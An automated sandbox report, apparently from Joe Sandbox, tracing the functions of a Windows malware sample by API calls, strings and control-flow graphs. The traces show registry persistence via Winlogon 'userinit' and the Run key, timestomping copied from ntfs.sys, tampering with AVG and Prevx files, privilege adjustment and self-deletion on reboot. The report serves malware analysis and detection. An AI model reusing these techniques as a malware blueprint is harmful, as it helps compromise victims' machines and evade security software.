                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                                • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                                • API String ID: 606440919-2829233815
                                                                                                                                                                                                                • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                                • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9
                                                                                                                                                                                                                Function 004000F1 Relevance: 24.0, APIs: 12, Strings: 1, Instructions: 1300fileCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 209 4000f1-4001e3 call 4001ca 214 4001e5-400258 209->214 215 400259 209->215 216 40025a-401011 214->216 215->216 221 401017-40101a 216->221 222 40113c-401141 216->222 221->222 223 401020-401022 221->223 223->222 224 401028-401044 CreateFileA 223->224 225 401139 224->225 226 40104a-401051 call 401e00 224->226 225->222 229 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 226->229 230 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 226->230 229->230 233 40106a-401089 GetSecurityDescriptorSacl 229->233 231 401105 230->231 232 4010f5-401103 SetEndOfFile 230->232 236 401108-401111 231->236 232->231 232->236 234 4010a0-4010a4 LocalFree 233->234 235 40108b-40109a SetNamedSecurityInfoA 233->235 234->230 235->234 237 401113-401120 GetHandleInformation 236->237 238 40112f-401136 236->238 237->238 239 401122-401126 237->239 239->238 240 401128-401129 CloseHandle 239->240 240->238
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                  • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                  • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                  • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                                • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 1027056982-820036962
                                                                                                                                                                                                                • Opcode ID: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                                • Instruction ID: f59e5f2c9003a6e204812eb1f8c7eb33969ee6ba3e941ca0e7e6302637e7b3a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9781346150E3C06FE7138B609C68B963FB49F57700F1A41EBE680EB1E3D26C4849C366
                                                                                                                                                                                                                Function 00401000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 241 401000-401011 242 401017-40101a 241->242 243 40113c-401141 241->243 242->243 244 401020-401022 242->244 244->243 245 401028-401044 CreateFileA 244->245 246 401139 245->246 247 40104a-401051 call 401e00 245->247 246->243 250 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 247->250 251 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 247->251 250->251 254 40106a-401089 GetSecurityDescriptorSacl 250->254 252 401105 251->252 253 4010f5-401103 SetEndOfFile 251->253 257 401108-401111 252->257 253->252 253->257 255 4010a0-4010a4 LocalFree 254->255 256 40108b-40109a SetNamedSecurityInfoA 254->256 255->251 256->255 258 401113-401120 GetHandleInformation 257->258 259 40112f-401136 257->259 258->259 260 401122-401126 258->260 260->259 261 401128-401129 CloseHandle 260->261 261->259
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                  • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                  • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                  • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                                • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 1027056982-820036962
                                                                                                                                                                                                                • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                                • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                                Function 00402930 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 106registryCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 262 402930-40296f RegCreateKeyExA 263 402975-4029d9 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 262->263 264 4029fd-402a1e RegCreateKeyExA 262->264 265 4029e0-4029e5 263->265 266 402a20-402a22 264->266 267 402a44-402a4a 264->267 265->265 268 4029e7-4029fb 265->268 269 402a25-402a2a 266->269 270 402a4c-402a57 RegFlushKey RegCloseKey 267->270 271 402a5d-402a60 267->271 272 402a3e RegSetValueExA 268->272 269->269 273 402a2c-402a3d 269->273 270->271 272->267 273->272
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                                • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • userinit, xrefs: 00402A38
                                                                                                                                                                                                                • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                                • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                                • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                                • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                                • API String ID: 3547530944-2324515132
                                                                                                                                                                                                                • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                                • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                                Function 004014B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93processstringCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 349 4014b0-401531 memset * 2 lstrcpynA CreateProcessA 350 401533-401543 349->350 351 40158f-401597 349->351 352 401545-40154e GetHandleInformation 350->352 353 40155d-401567 350->353 352->353 354 401550-401554 352->354 355 401581-40158c 353->355 356 401569-401572 GetHandleInformation 353->356 354->353 357 401556-401557 CloseHandle 354->357 356->355 358 401574-401578 356->358 357->353 358->355 359 40157a-40157b CloseHandle 358->359 359->355
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                                • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                • API String ID: 2248944234-2746444292
                                                                                                                                                                                                                • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                                • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                                Function 00401BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76filetimeCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 360 401be0-401c0c CreateFileA 361 401c12-401c2e GetFileTime 360->361 362 401ca5-401caa 360->362 363 401c30-401c3d GetHandleInformation 361->363 364 401c4c-401c69 CreateFileA 361->364 363->364 365 401c3f-401c43 363->365 364->362 366 401c6b-401c87 SetFileTime 364->366 365->364 367 401c45-401c46 CloseHandle 365->367 366->362 368 401c89-401c96 GetHandleInformation 366->368 367->364 368->362 369 401c98-401c9c 368->369 369->362 370 401c9e-401c9f CloseHandle 369->370 370->362
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                                • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                                • SetFileTime.KERNELBASE(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                                • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                                • API String ID: 1046229350-2760794270
                                                                                                                                                                                                                • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                                • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                                Function 004012B0 Relevance: 13.6, APIs: 9, Instructions: 66fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                                • PathFileExistsA.KERNELBASE(?), ref: 00401302
                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                                • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040135C
                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(?), ref: 00401369
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2787354276-0
                                                                                                                                                                                                                • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                                • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                                Function 00402450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                                • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFolderMovePath
                                                                                                                                                                                                                • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                                • API String ID: 1404575960-1083204512
                                                                                                                                                                                                                • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                                • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                                Function 0040219A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                • String ID: v-@
                                                                                                                                                                                                                • API String ID: 3664257935-4190885519
                                                                                                                                                                                                                • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                                • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5

                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                Function 00403560 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 368memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                                • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                                • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                                • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                  • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                  • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                  • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                  • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                  • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004036CB
